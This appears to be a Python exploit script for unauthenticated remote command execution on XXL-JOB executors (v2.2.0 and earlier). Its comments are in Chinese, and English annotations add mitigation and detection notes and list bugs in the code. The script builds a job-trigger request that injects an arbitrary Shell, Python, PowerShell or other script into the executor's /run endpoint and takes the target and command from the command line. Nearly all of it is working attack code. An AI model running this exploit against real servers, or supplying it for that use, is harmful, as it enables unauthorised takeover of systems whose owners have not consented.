    xxl-job-rce.py
    1.99 KB / 2021-06-28 05:31:32
        #xxl-job未授权加命令执行漏洞,支持 <=v2.2.0 版本
    #支持脚本语言有Shell、Python、NodeJS、PHP、PowerShell
    #windows推荐使用PowerShell,Linux推荐使用shell
    #如果不行可尝试其它方式,前提是环境支持
    
    
    import requests
    import argparse
    import time
    import sys
    
    # Local intercepting-proxy settings (127.0.0.1:8080) for inspecting the
    # generated request. NOTE(review): nothing in the visible code passes this
    # mapping to requests, so as written it has no effect on the traffic.
    proxies = dict(
        http="http://127.0.0.1:8080",
        https="http://127.0.0.1:8080",
    )
    
    
    def exp(url,cmd,method):
        """Send one job-trigger request to an XXL-JOB executor's ``/run`` endpoint.

        The body is assembled by string concatenation: ``method`` is appended to
        the ``GLUE_`` prefix in ``glueType`` and ``cmd`` is placed in
        ``glueSource``. The request carries no access-token header; per the file
        header this targets the unauthenticated executor API of versions
        <= v2.2.0.

        Args:
            url: Base URL of the executor (scheme, host and port); ``/run`` is
                appended here.
            cmd: Script text inserted into ``glueSource`` without escaping.
            method: Upper-cased glue type suffix (the caller passes e.g.
                ``POWERSHELL``), inserted after ``GLUE_``.

        Returns:
            None. A status line is printed based only on the HTTP status code.

        Defensive notes:
            * Mitigation: set a non-empty ``xxl.job.accessToken`` on both the
              admin and the executors, keep the executor port reachable only
              from the scheduling admin, and upgrade past the affected versions.
            * Detection: POST requests to ``/run`` on the executor port that
              contain a ``GLUE_*`` ``glueType`` together with inline
              ``glueSource``, especially from hosts other than the admin.
        """
        # Current time in milliseconds; used below as the glueUpdatetime value.
        times = round(time.time() * 1000)
        # The Content-Type announces a form-encoded body although the payload is
        # JSON text; that mismatch is visible in proxy and WAF logs.
        headers = {'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept-Encoding': 'gzip, deflate'}
        # Trigger parameters as a hand-built JSON string. jobId, logId and
        # logDateTime are fixed constants; only glueType, glueSource and
        # glueUpdatetime vary. The inserted values are concatenated without JSON
        # escaping.
        data = '''{
      "jobId": 1,
      "executorHandler": "demoJobHandler",
      "executorParams": "demoJobHandler",
      "executorBlockStrategy": "COVER_EARLY",
      "executorTimeout": 0,
      "logId": 1,
      "logDateTime": 1586629003729,
      "glueType": "GLUE_'''+method+'''",
      "glueSource": "'''+cmd+'''",
      "glueUpdatetime":''' +str(times)+''',
      "broadcastIndex": 0,
      "broadcastTotal": 0
    }'''
    
    
    
        # NOTE(review): no timeout is passed, so this call can block indefinitely,
        # and the module-level `proxies` mapping is not used here.
        response = requests.post(url=url+"/run",headers=headers,data=data)
        # NOTE(review): HTTP 200 only shows that the endpoint answered. The
        # response body is never inspected, so the "success" message does not
        # confirm that the job ran; an executor that enforces an access token
        # may presumably also answer 200 with an error payload - verify before
        # treating the output as a finding.
        if response.status_code == 200:
            print("commond excute success")
        else:
            print("access failed")
    
    if __name__ == '__main__':
        # Command-line entry point: parse the target and options, build the
        # executor base URL and hand everything to exp().
        cli = argparse.ArgumentParser(
            description='python3 xxl-job-rce.py [IP Address] -p [Prot(default 9999)] -c [Command] -m[Ccript Method(default powershell)]',
            epilog='Use:python3 xxl-job-poc.py 192.168.229.146 -c calc',
        )
        cli.add_argument('address', nargs='*', help='Destination IP address')
        cli.add_argument('-p', '--port', default=9999)
        cli.add_argument('-c', '--commond')
        cli.add_argument('-m', '--method', default="powershell",
                         help="Shell、Python、NodeJS、PHP、PowerShell")
        opts = cli.parse_args()

        # 'address' is declared with nargs='*', so it arrives as a list and only
        # its first element is used; an empty list raises IndexError here.
        # The scheme is always plain http.
        base_url = 'http://{}:{}'.format(opts.address[0], opts.port)

        # NOTE(review): '-c' has no default, so opts.commond may be None, in
        # which case the string concatenation inside exp() raises TypeError.
        exp(base_url, opts.commond, opts.method.upper())
    
    